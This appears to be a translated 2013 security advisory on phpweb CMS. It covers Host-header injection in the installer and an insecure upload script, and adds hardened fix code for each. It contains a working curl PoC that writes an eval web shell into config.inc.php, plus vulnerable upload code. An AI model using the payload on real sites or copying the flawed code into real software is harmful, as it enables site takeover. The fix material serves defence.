phpweb finished-website system, latest version (injection, upload, writing a shell) - vulnerability warning - Black Bar Safety Net (myhack58)

2013-01-04T00:00:00
ID MYHACK58:62201336563
Type myhack58
Reporter 佚名 (anonymous)
Modified 2013-01-04T00:00:00

Description

Injection:

Why this one is of limited value: the exploit relies on the install file regenerating the configuration file, and it writes executable code into that file.

Drawback 1: it is very destructive, because it rewrites the configuration file (the database connection file).

Drawback 2: webmasters with some basic security sense delete the install directory.

Although of limited value, it also has advantages: it is not affected by magic_quotes_gpc, nor by which web server is in use.

Analysis (from the install script; the database values come from the install form, the site URL from the Host header):

$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; // not filtered: taken straight from the Host header
$filestr = fread(fopen($SysConfigFile, 'r'), 30000); // read the configuration template
$filestr=str_replace(" ","",$filestr);
$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
$filestr=str_replace("DefaultDbName",$dbname,$filestr);
$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
$filestr=str_replace("DefaultsLan","EN",$filestr);
$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr); // the unfiltered host value is pasted into a PHP string literal in the template
fwrite(fopen($ConFile,"w"),$filestr,30000); // the result is written out as the live configuration file

$_SERVER["HTTP_HOST"] comes from the HOST field of the HTTP request header, so the client controls it, and it is not affected by magic_quotes_gpc ^_^

PoC:

curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

shell address: /config.inc.php

As with the earlier phpcms case, this needs a database the installer can connect to (a remote one will do), otherwise the install step does not complete and the file is not written.
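For the fix side of the analysis above, here is an added example (written for this page, not phpweb's own code) of how the installer step should be done. It makes two changes: the host name is validated against a strict pattern and an optional allowlist instead of being trusted from the Host header, and the configuration file is generated with var_export() so every value is emitted as a properly quoted PHP literal rather than pasted into a template with str_replace(). It also refuses to run once a config file exists, which addresses the "rewrites the configuration file" problem. The function names validateHost() and buildConfigFile(), the $allowedHosts list, the config keys and the config path are assumptions for this example.

```php
<?php
// Added example, not phpweb's code. Hardened replacement for the install step that
// builds config.inc.php. Names (validateHost, buildConfigFile, $allowedHosts, the
// config keys) are assumptions for this example.

function validateHost(string $host, array $allowedHosts = []): string
{
    // RFC 1123 host name with an optional :port. Quotes, semicolons, spaces,
    // '#' and anything else that could alter PHP source cannot pass this pattern.
    $pattern = '/^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*'
             . '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?$/i';
    if (!preg_match($pattern, $host)) {
        throw new InvalidArgumentException('Rejected host name');
    }
    // Optional allowlist: the installer knows which names the site is served under.
    if ($allowedHosts !== []
        && !in_array(strtolower($host), array_map('strtolower', $allowedHosts), true)) {
        throw new InvalidArgumentException('Host not in allowlist');
    }
    return $host;
}

function buildConfigFile(array $settings): string
{
    // var_export() writes each value as a quoted, escaped PHP literal. A value such as
    //   localhost";eval($_REQUEST[a]);#
    // becomes the harmless string 'localhost";eval($_REQUEST[a]);#' inside the array;
    // it is data, not code, so no template-splicing is needed.
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// --- usage during install (values below are constructed for the example) ---

$configPath = __DIR__ . '/../config.inc.php';   // assumed location of the live config

// Do not let the installer rewrite an existing configuration (the "drawback 1" above).
if (is_file($configPath)) {
    http_response_code(403);
    exit('Already installed: remove the install directory.');
}

$host = validateHost($_SERVER['HTTP_HOST'] ?? 'localhost', ['localhost', 'www.example.com']);

$config = buildConfigFile([
    'dbhost'   => 'localhost',
    'dbname'   => 'phpweb',
    'dbuser'   => 'phpweb_user',
    'dbpass'   => 'change-me',
    'tablepre' => 'pw_',
    'lang'     => 'EN',
    'siteurl'  => 'http://' . $host . '/',
]);

file_put_contents($configPath, $config, LOCK_EX);
```

The rest of the application then loads the settings with `$cfg = require 'config.inc.php';`. Even if the allowlist is left empty, the pattern alone rejects the header used in the PoC, and because the file is produced from a PHP array rather than by string substitution, no value can terminate the string literal it lives in.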


Upload vulnerability (feedback needed):

Vulnerable file: /kedit/upload_cgi/upload.php

Many people know this one, but it is of limited value: it can only be used together with the IIS6 parsing vulnerability or with GPC turned off.

<?php
define("ROOTPATH", "../../");
include(ROOTPATH."includes/admin.inc.php");
NeedAuth(0);

$dt=date("Ymd",time());
// attachPath is taken straight from the POST body: the client chooses the directory
if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
    @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
}

// directory path where the file is saved
$save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
echo $save_path; // the filesystem path is echoed back to the client

// directory URL where the file is saved
$save_url = '../../'.$_POST['attachPath'].$dt.'/';

// allowed upload file extensions
$ext_arr = array('gif','jpg','png','bmp'); // suffix restriction

// maximum file size
$max_size = 1000000;

// change directory permissions
@mkdir($save_path, 0777);

// full file path: fileName also comes from the POST body, so the client chooses the saved file name
$file_path = $save_path.$_POST['fileName']; // saved file name

// file URL
$file_url = $save_url.$_POST['fileName'];
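The problem in the snippet above is that both attachPath and fileName come from $_POST, so the client picks the directory, the file name and (whatever $ext_arr says) the final extension, and the directory is created world-writable. The following is an added example of how that path logic should be written; it is not kedit's or phpweb's code. The storage root is fixed server-side and the client may only choose a key from an allowlist; the stored name is generated on the server, with the client's name contributing nothing but an allowlisted extension; and the resolved path is checked with realpath() to stay under the web root. The names $uploadRoots, safeUploadPath(), the 'area' POST field and the 'imgFile' upload field are assumptions for this example.

```php
<?php
// Added example, not kedit's/phpweb's code. Hardened replacement for the path logic of
// upload.php. $uploadRoots, safeUploadPath(), the 'area' and 'imgFile' fields are assumed.

define('ROOTPATH', __DIR__ . '/../../');

// The client can only pick one of these keys; it never supplies a path fragment.
$uploadRoots = [
    'image' => 'attached/image/',
    'file'  => 'attached/file/',
];
$ext_arr  = ['gif', 'jpg', 'jpeg', 'png', 'bmp'];   // same allowlist idea as the original
$max_size = 1000000;

function safeUploadPath(string $rootKey, string $clientName, array $roots, array $allowedExt): string
{
    if (!isset($roots[$rootKey])) {
        throw new InvalidArgumentException('Unknown upload area');
    }

    // Only the extension of the client-supplied name is used, taken from the last dot,
    // and only if it is allowlisted. basename() discards any directory component.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        throw new InvalidArgumentException('Extension not allowed');
    }

    // Date-based subdirectory as in the original, but created 0755 rather than 0777.
    $dir = ROOTPATH . $roots[$rootKey] . date('Ymd') . '/';
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        throw new RuntimeException('Cannot create upload directory');
    }

    // Server-generated file name: no client-controlled bytes reach the filesystem path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $path = realpath($dir) . DIRECTORY_SEPARATOR . $name;

    // Belt and braces: the resolved directory must still be inside the web root.
    $base = realpath(ROOTPATH);
    if ($base === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Resolved path escapes the web root');
    }
    return $path;
}

// --- usage (field names are assumptions for this example) ---

if (isset($_FILES['imgFile']) && $_FILES['imgFile']['error'] === UPLOAD_ERR_OK) {
    if ($_FILES['imgFile']['size'] > $max_size) {
        http_response_code(413);
        exit('File too large');
    }
    try {
        $dest = safeUploadPath($_POST['area'] ?? 'image', $_FILES['imgFile']['name'], $uploadRoots, $ext_arr);
    } catch (Exception $e) {
        http_response_code(400);
        exit('Upload rejected');
    }
    if (!move_uploaded_file($_FILES['imgFile']['tmp_name'], $dest)) {
        http_response_code(500);
        exit('Upload failed');
    }
    // Return a site-relative URL, not the filesystem path the original script echoed.
    echo '/' . substr($dest, strlen(realpath(ROOTPATH)) + 1);
}
```

Two points on the design: the extension check is on the last dot only and the stored name is random, so the client's name can never become a path component or a second extension; and because the web-server parsing quirk mentioned above (IIS6) acts on the stored path, not on the uploaded name, keeping the path fully server-generated is what removes that dependency. Serving the upload directory with script execution disabled is the complementary server-side control.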
